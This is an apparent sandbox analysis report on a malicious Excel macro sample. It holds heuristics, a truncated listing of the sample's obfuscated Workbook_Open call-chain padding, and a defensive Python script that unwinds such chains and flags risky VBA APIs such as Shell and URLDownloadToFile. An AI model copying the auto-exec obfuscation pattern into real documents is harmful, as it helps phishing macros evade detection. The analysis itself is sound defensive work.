Verdict: MALICIOUS
Risk Score: 188
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample is an Excel workbook whose VBA project defines a Workbook_Open handler (spelled `WORKBOoK_OPeN` in the source; VBA identifiers are case-insensitive, so it still fires when the workbook is opened) and calls Shell(), so the macro is built to execute commands as soon as a user enables macros. The VBA is heavily obfuscated: the entry point starts a long chain of procedures with random-looking 15-character names, each of which does nothing but call the next one, which hides the real payload from casual reading and from simple pattern matching. The Workbook_Open handler, the Shell() and Environ() calls, and the ClamAV detection name (Valyria) together point to downloader or dropper functionality, although the preview below is truncated before the procedure that does the actual work. The document body displays a fake macro error message to lure the user into enabling macros.
Heuristics (5)
- ClamAV: Xls.Malware.Valyria-10036514-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL)
- Workbook_Open macro (high, OLE_VBA_WBOPEN)
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 111647 bytes | 9cdc01132fcdb78f68afae0f955a3e45ae3c31ffe521d26a5b94a24b2ccd6259 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Kurban2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Kurban1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WORKBOoK_OPeN(): Call BxXRyBtUEullqxI: End Sub
Static Function BxXRyBtUEullqxI() As Long
Call YWLZgeFDdMFbImw
End Function
Function YWLZgeFDdMFbImw() As Double
Call YbLqaeqCChBbWFv
End Function
Private Function YbLqaeqCChBbWFv() As Currency
Call xsiMYFgWvzgqxbT
End Function
Static Function xsiMYFgWvzgqxbT() As Long
Call MLaGLqStUSrTNsK
End Function
Static Sub MLaGLqStUSrTNsK()
Call lUhqXRnzimiHxuS
End Sub
Function lUhqXRnzimiHxuS() As Boolean
Call CeJxYADIbGFIWst
End Function
Private Sub CeJxYADIbGFIWst()
Call WRsQuUeetVAMayH
End Sub
Static Sub WRsQuUeetVAMayH()
Call oUDlKDYYHqimJcS
End Sub
Static Sub oUDlKDYYHqimJcS()
Call eimMeNZoqKzbEJB
End Sub
Private Sub eimMeNZoqKzbEJB()
Call LyqKnfVGEdxdpkF
End Sub
Private Function LyqKnfVGEdxdpkF() As Double
Call CFJyWoAHJxartyY
End Function
Private Function CFJyWoAHJxartyY() As String
Call lNwKtGaLsSjSmGM
End Function
Sub lNwKtGaLsSjSmGM()
Call rgIcVzHkwkcHtRX
End Sub
Private Sub rgIcVzHkwkcHtRX()
Call pCoRlCiMeCBKpXD
End Sub
Private Function pCoRlCiMeCBKpXD() As Variant
Call xNjxbutXDWFYFOz
End Function
Static Sub xNjxbutXDWFYFOz()
Call wbzAHvzkHpqAKBO
End Sub
Function wbzAHvzkHpqAKBO() As Date
Call FeesMmohBKFniZt
End Function
Private Function FeesMmohBKFniZt() As Object
Call TFmZjYwSEcGrqJB
End Function
Private Function TFmZjYwSEcGrqJB() As Date
Call dBBfDOPATygDXOQ
End Function
Private Function dBBfDOPATygDXOQ() As Byte
Call tTtZqyBXsRrfofI
End Function
Sub tTtZqyBXsRrfofI()
Call SdAJCZWdGliUXhP
End Sub
Private Function SdAJCZWdGliUXhP() As Integer
Call jnbQEImmAFFVxer
End Function
Private Sub jnbQEImmAFFVxer()
Call XJbdJTIQOWLljfq
End Sub
Sub XJbdJTIQOWLljfq()
Call wZGZEtiAOQgfSoR
End Sub
Sub wZGZEtiAOQgfSoR()
Call mopzYDjPxjxTNVB
End Sub
Static Function mopzYDjPxjxTNVB() As Boolean
Call TDtyhWfhLCwVyxE
End Function
Static Sub TDtyhWfhLCwVyxE()
Call YfVCtQhVuTdmvbg
End Sub
Static Function YfVCtQhVuTdmvbg() As Double
Call HnIORiHZdnnNpjU
End Function
Function HnIORiHZdnnNpjU() As Integer
Call zmLQPqRMCJaACdX
End Function
Static Function zmLQPqRMCJaACdX() As Single
Call xHrFfssnlbACyjC
End Function
Static Function xHrFfssnlbACyjC() As Long
Call FTmlVkDyKvDROby
End Function
Sub FTmlVkDyKvDROby()
Call DgCoAlJMOOosTNN
End Sub
Private Function DgCoAlJMOOosTNN() As Object
Call aFqwjOWumgIilCB
End Function
Static Function aFqwjOWumgIilCB()
Call bKpNdOGtLBEjzVB
End Function
Private Function bKpNdOGtLBEjzVB() As Object
Call zbNjbqwOEUjyarY
End Function
Static Sub zbNjbqwOEUjyarY()
Call AYwNkpLzyqqYxrH
End Sub
Private Sub AYwNkpLzyqqYxrH()
Call oDMNaBDrrGlPaLX
End Sub
Static Sub oDMNaBDrrGlPaLX()
Call lahtmJcecHvKzRE
End Sub
Function lahtmJcecHvKzRE() As Currency
Call MbYqOjbWMcwXrAv
End Function
Private Function MbYqOjbWMcwXrAv() As Object
Call szsbIDtCFujATvP
End Function
Private Sub szsbIDtCFujATvP()
Call iOcCcNuSoNApOcy
End Sub
Static Sub iOcCcNuSoNApOcy()
Call PdfAlgqkCgzrzDC
End Sub
Function PdfAlgqkCgzrzDC() As String
Call GkzoToVmGBbEDRV
End Function
Function GkzoToVmGBbEDRV()
Call osmArGvppVlfxZJ
End Function
Private Sub osmArGvppVlfxZJ()
Call vMySSzbPtndVEkU
End Sub
Static Sub vMySSzbPtndVEkU()
Call fMVrFQgExJyVGZs
End Sub
Function fMVrFQgExJyVGZs()
Call AtZnZuOBBZGmPhv
End Function
Private Sub AtZnZuOBBZGmPhv()
Call zGpqEvUOFtrOVUL
End Sub
Static Function zGpqEvUOFtrOVUL() As Byte
Call IKUiJmJLyOGBtsq
End Functio
... (truncated)
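The preview shows the obfuscation pattern an analyst has to get past: a case-mangled auto-exec name and dozens of procedures that each contain a single Call to the next. The script below is an added example, not part of the report or of the sample, that collapses that call-chain padding with a small stdlib-only parser (no oletools dependency): it locates auto-exec entry points case-insensitively, follows pass-through procedures until it reaches one that does more than forward the call, and lists the risky APIs used there. The input is a constructed VBA fragment written in the same style as the preview; its procedure names and its terminal Shell(Environ(...)) call are assumptions for illustration, since the real sample's terminal procedure is not visible in the truncated preview.

```python
import re
from typing import Dict, List, Tuple

# Auto-exec procedure names Office runs without user interaction (compared lower-case).
AUTOEXEC = {"workbook_open", "auto_open", "document_open", "autoopen",
            "workbook_activate", "auto_close", "workbook_beforeclose"}
# APIs worth flagging in whatever procedure the chain ends in.
SUSPICIOUS = ("Shell", "Environ", "CreateObject", "WScript.Shell", "URLDownloadToFile")

HEADER = re.compile(r"^(?:(?:Public|Private|Static|Friend)\s+)*(?:Sub|Function)\s+(\w+)\s*\(", re.I)
END = re.compile(r"^End\s+(?:Sub|Function)\b", re.I)
CALL = re.compile(r"^(?:Call\s+)?(\w+)\s*(?:\(\s*\))?$", re.I)

# Constructed sample modelled on the preview above: mixed-case entry point, a chain of
# one-call procedures, and an assumed terminal procedure. Not the sample's own code.
SAMPLE_VBA = """\
Option Explicit
Public Sub WORKBOoK_OPeN(): Call aaaBBBccc: End Sub
Static Function aaaBBBccc() As Long
Call dddEEEfff
End Function
Private Sub dddEEEfff()
Call gggHHHiii
End Sub
Function gggHHHiii() As Double
Call jjjKKKlll
End Function
Private Function jjjKKKlll() As Boolean
Dim r As Long
r = Shell(Environ("COMSPEC") & " /c dir", 0)
End Function
"""


def split_statements(line: str) -> List[str]:
    """Split one VBA line on ':' separators, ignoring ':' inside strings and ' comments."""
    out, cur, in_str = [], [], False
    for ch in line:
        if ch == '"':
            in_str = not in_str
        if ch == "'" and not in_str:
            break
        if ch == ":" and not in_str:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur).strip())
    return [s for s in out if s]


def parse_procs(src: str) -> Dict[str, List[str]]:
    """Map each Sub/Function name to the statements in its body."""
    procs: Dict[str, List[str]] = {}
    current = None
    for raw in src.splitlines():
        for stmt in split_statements(raw):
            m = HEADER.match(stmt)
            if m:
                current = m.group(1)
                procs[current] = []
            elif END.match(stmt):
                current = None
            elif current is not None:
                procs[current].append(stmt)
    return procs


def find_autoexec(procs: Dict[str, List[str]]) -> List[str]:
    """Entry points Office runs automatically; VBA ignores case, so WORKBOoK_OPeN counts."""
    return [name for name in procs if name.lower() in AUTOEXEC]


def resolve_chain(procs: Dict[str, List[str]], entry: str) -> Tuple[List[str], str]:
    """Follow procedures whose whole body is one bare call to another known procedure."""
    lookup = {n.lower(): n for n in procs}
    chain, seen, cur = [entry], {entry.lower()}, entry
    while True:
        body = procs[cur]
        if len(body) != 1:
            return chain, cur
        m = CALL.match(body[0])
        if not m or m.group(1).lower() not in lookup:
            return chain, cur
        nxt = lookup[m.group(1).lower()]
        if nxt.lower() in seen:  # recursive chain: stop instead of looping forever
            return chain, cur
        chain.append(nxt)
        seen.add(nxt.lower())
        cur = nxt


def suspicious_calls(statements: List[str]) -> List[str]:
    """Risky APIs referenced in a procedure body, matched as whole words, case-insensitively."""
    text = "\n".join(statements)
    return sorted(api for api in SUSPICIOUS
                  if re.search(r"\b" + re.escape(api) + r"\b", text, re.I))


def analyze(src: str) -> dict:
    """Per auto-exec entry: chain length, the procedure that does real work, and its APIs."""
    procs = parse_procs(src)
    report = {"procedures": len(procs), "entries": []}
    for entry in find_autoexec(procs):
        chain, terminal = resolve_chain(procs, entry)
        report["entries"].append({
            "entry": entry,
            "hops": len(chain) - 1,
            "terminal": terminal,
            "terminal_body": procs[terminal],
            "suspicious": suspicious_calls(procs[terminal]),
        })
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_VBA), indent=2))
```

To run this against the artifact on this page, read the decoded `macros.bas` into `analyze()` instead of `SAMPLE_VBA`; the same pass-through rule applies because every procedure in the preview has a single Call as its only statement. The parser is deliberately narrow (it does not handle line continuations, `On Error` blocks or calls routed through `Application.Run`), so a chain that stops early at a procedure with more than one statement is a signal to read that procedure by hand, not proof that the payload is there.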